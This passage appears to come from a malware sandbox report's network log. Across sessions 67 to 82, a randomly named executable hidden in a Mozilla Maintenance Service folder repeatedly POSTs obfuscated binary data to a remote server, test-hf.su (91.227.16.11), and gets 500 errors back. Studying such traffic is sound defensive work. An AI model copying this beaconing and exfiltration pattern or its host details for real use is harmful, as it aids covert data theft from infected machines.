                                                                    Mar 5, 2024 22:28:34.385080099 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:28:34.595057011 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:34.595295906 CET | 2596 | OUT | Data Raw: 54 5c 54 59 5b 5b 50 56 5e 57 5a 51 57 51 50 5f 54 55 54 52 56 54 57 59 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T\TY[[PV^WZQWQP_TUTRVTWYT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:89'>':;*Y08[&90"? V5+3#^1,]-9%Z"!Q*
                                                                    Mar 5, 2024 22:28:34.831151009 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:34 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    67 | 192.168.2.5 | 49789 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:35.157700062 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2592
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:35.370455980 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:35.370646954 CET | 2592 | OUT | Data Raw: 54 5d 54 50 5b 5b 50 50 5e 57 5a 51 57 59 50 59 54 52 54 5a 56 58 57 59 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T]TP[[PP^WZQWYPYTRTZVXWYT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9B,-%3%_3%985'(<1_?55? '$2.8%Z"!Q*!
                                                                    Mar 5, 2024 22:28:35.608429909 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    68 | 192.168.2.5 | 49790 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:35.946909904 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:36.156626940 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:36.157013893 CET | 2596 | OUT | Data Raw: 51 5c 51 5e 5b 5c 55 52 5e 57 5a 51 57 5c 50 5b 54 50 54 5c 56 54 57 58 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q\Q^[\UR^WZQW\P[TPT\VTWXT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9A835[&%6;?"Y3]&/!?'6<7_'B;\1<=-)%Z"!Q*=
                                                                    Mar 5, 2024 22:28:36.390614986 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:36 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    69 | 192.168.2.5 | 49791 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:36.569272041 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1920
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:36.782855988 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:36.783227921 CET | 1920 | OUT | Data Raw: 54 5a 51 5d 5b 5f 50 57 5e 57 5a 51 57 50 50 5a 54 54 54 5c 56 5b 57 5c 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TZQ][_PW^WZQWPPZTTT\V[W\T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9D."10#1]'P&],5$;\2*$U5<Q#<,3&?",%Z"!Q*
                                                                    Mar 5, 2024 22:28:37.022408962 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:36 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    70 | 192.168.2.5 | 49792 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:36.696899891 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2592
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:36.911490917 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:36.911720037 CET | 2592 | OUT | Data Raw: 54 5c 54 50 5b 5e 55 57 5e 57 5a 51 57 59 50 58 54 56 54 53 56 5d 57 5d 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T\TP[^UW^WZQWYPXTVTSV]W]T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9A,"-%3136:\8/' 2;#,V!, $4<%<2\,%Z"!Q*%
                                                                    Mar 5, 2024 22:28:37.150871038 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    71 | 192.168.2.5 | 49793 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:37.491072893 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:28:37.702842951 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:37.703104973 CET | 2596 | OUT | Data Raw: 54 5e 51 5b 5b 57 55 50 5e 57 5a 51 57 58 50 5a 54 57 54 58 56 5d 57 5c 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T^Q[[WUP^WZQWXPZTWTXV]W\T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9B8!%363"\;6&(&(V5Z<P!0;X2?%/)%Z"!Q*-
                                                                    Mar 5, 2024 22:28:37.941956997 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    72 | 192.168.2.5 | 49794 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:38.270896912 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:38.481709003 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:38.481950998 CET | 2596 | OUT | Data Raw: 54 50 54 59 5e 5d 55 57 5e 57 5a 51 57 51 50 52 54 56 54 59 56 5c 57 54 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TPTY^]UW^WZQWQPRTVTYV\WTT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9A/253'69810^$2*3!(W",\0'#]1/!;%Z"!Q*
                                                                    Mar 5, 2024 22:28:38.715204000 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    73 | 192.168.2.5 | 49795 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:39.052227974 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:39.261208057 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:39.262015104 CET | 2596 | OUT | Data: binary request body
                                                                    Mar 5, 2024 22:28:39.497524023 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    74 | 192.168.2.5 | 49796 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:39.831615925 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:40.043018103 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:40.043349981 CET | 2596 | OUT | Data: binary request body
                                                                    Mar 5, 2024 22:28:40.279078960 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    75 | 192.168.2.5 | 49797 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:40.613246918 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:40.822846889 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:40.823086023 CET | 2596 | OUT | Data: binary request body
                                                                    Mar 5, 2024 22:28:41.065325022 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    76 | 192.168.2.5 | 49798 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:41.394965887 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:41.603652000 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:41.603885889 CET | 2596 | OUT | Data: binary request body
                                                                    Mar 5, 2024 22:28:41.841346979 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    77 | 192.168.2.5 | 49800 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:42.238491058 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1920
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:42.445571899 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:42.445883036 CET | 1920 | OUT | Data: binary request body
                                                                    Mar 5, 2024 22:28:42.694144011 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    78 | 192.168.2.5 | 49801 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:42.365664959 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:42.576636076 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:42.576853037 CET | 2596 | OUT | Data: binary request body
                                                                    Mar 5, 2024 22:28:42.813406944 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    79 | 192.168.2.5 | 49802 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:43.143866062 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:28:43.355164051 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:43.355372906 CET | 2596 | OUT | Data: binary request body
                                                                    Mar 5, 2024 22:28:43.594196081 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    80 | 192.168.2.5 | 49803 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:43.924304008 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:44.134926081 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:44.135270119 CET | 2596 | OUT | Data: binary request body
                                                                    Mar 5, 2024 22:28:44.376697063 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    81 | 192.168.2.5 | 49804 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:44.707488060 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:44.917486906 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:44.917890072 CET | 2596 | OUT | Data: binary request body
                                                                    Mar 5, 2024 22:28:45.155961037 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    82 | 192.168.2.5 | 49805 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:45.494246960 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
